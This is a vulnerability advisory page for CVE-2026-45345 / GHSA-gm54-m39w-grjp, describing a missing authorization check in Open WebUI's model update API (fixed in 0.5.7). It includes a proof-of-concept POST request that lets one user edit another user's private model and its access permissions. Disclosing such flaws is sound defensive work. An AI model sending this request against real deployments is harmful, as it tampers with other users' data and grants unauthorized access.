GHSA-GM54-M39W-GRJP

Vulnerability from github – Published: 2026-05-14 20:21 – Updated: 2026-05-19 15:59
VLAI
Summary
Open WebUI missing authorization check at the model update function - models from other users can be updated
Details

Summary

A user can modify another user's model even if its visibility is set to Private. The finding resulted from a penetration test for a customer. It is suspected that the root cause of the issue lies within the core of Open WebUI, which is why it is being reported as a security issue here. Tested on Open WebUI 0.5.4.

Details / PoC

The user Victim created a private model with the visibility set to private: grafik

The user Attacker can edit this model using the following POST request:

POST /api/v1/models/model/update?id=aaabraaa HTTP/2
Host: domain.local
//Some headers removed
Te: trailers

{"id":"aaabraaa","base_model_id":"gpt-4o-POC","name":"testmodel","meta":{"profile_image_url":"/static/favicon.png","description":"","capabilities":{"vision":true,"usage":false,"citations":true},"suggestion_prompts":null,"tags":[],"toolIds":["test"]},"params":{},"user_id":"565c82e6-083f-42bb-bf0f-a4e214cfb9ad","access_control":{"read":{"group_ids":[],"user_ids":[]},"write":{"group_ids":[],"user_ids":[]}},"is_active":true,"updated_at":1737314575,"created_at":1737121281}

Request / Response grafik

Impact

A user can modify another user's model even if its visibility is set to Private. By changing the access permissions during editing, unauthorized access can be gained.

Severity
6.5 (Medium)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.5.6"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "open-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.5.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-45345"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-14T20:21:38Z",
    "nvd_published_at": "2026-05-15T22:16:54Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nA user can modify another user\u0027s model even if its visibility is set to `Private`.\nThe finding resulted from a penetration test for a customer. It is suspected that the root cause of the issue lies within the core of Open WebUI, which is why it is being reported as a security issue here. Tested on Open WebUI 0.5.4.\n\n### Details / PoC\nThe user `Victim` created a private model with the visibility set to `private`: \n![grafik](https://github.com/user-attachments/assets/de057943-512b-46bf-8671-2904d55ec056)\n\nThe user `Attacker` can edit this model using the following POST request:\n```\nPOST /api/v1/models/model/update?id=aaabraaa HTTP/2\nHost: domain.local\n//Some headers removed\nTe: trailers\n\n{\"id\":\"aaabraaa\",\"base_model_id\":\"gpt-4o-POC\",\"name\":\"testmodel\",\"meta\":{\"profile_image_url\":\"/static/favicon.png\",\"description\":\"\",\"capabilities\":{\"vision\":true,\"usage\":false,\"citations\":true},\"suggestion_prompts\":null,\"tags\":[],\"toolIds\":[\"test\"]},\"params\":{},\"user_id\":\"565c82e6-083f-42bb-bf0f-a4e214cfb9ad\",\"access_control\":{\"read\":{\"group_ids\":[],\"user_ids\":[]},\"write\":{\"group_ids\":[],\"user_ids\":[]}},\"is_active\":true,\"updated_at\":1737314575,\"created_at\":1737121281}\n```\nRequest / Response\n![grafik](https://github.com/user-attachments/assets/19986403-b782-4288-b618-202b55519bb1)\n\n### Impact\nA user can modify another user\u0027s model even if its visibility is set to `Private`. By changing the access permissions during editing, unauthorized access can be gained.",
  "id": "GHSA-gm54-m39w-grjp",
  "modified": "2026-05-19T15:59:21Z",
  "published": "2026-05-14T20:21:38Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-gm54-m39w-grjp"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45345"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/open-webui/open-webui"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Open WebUI missing authorization check at the model update function - models from other users can be updated"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.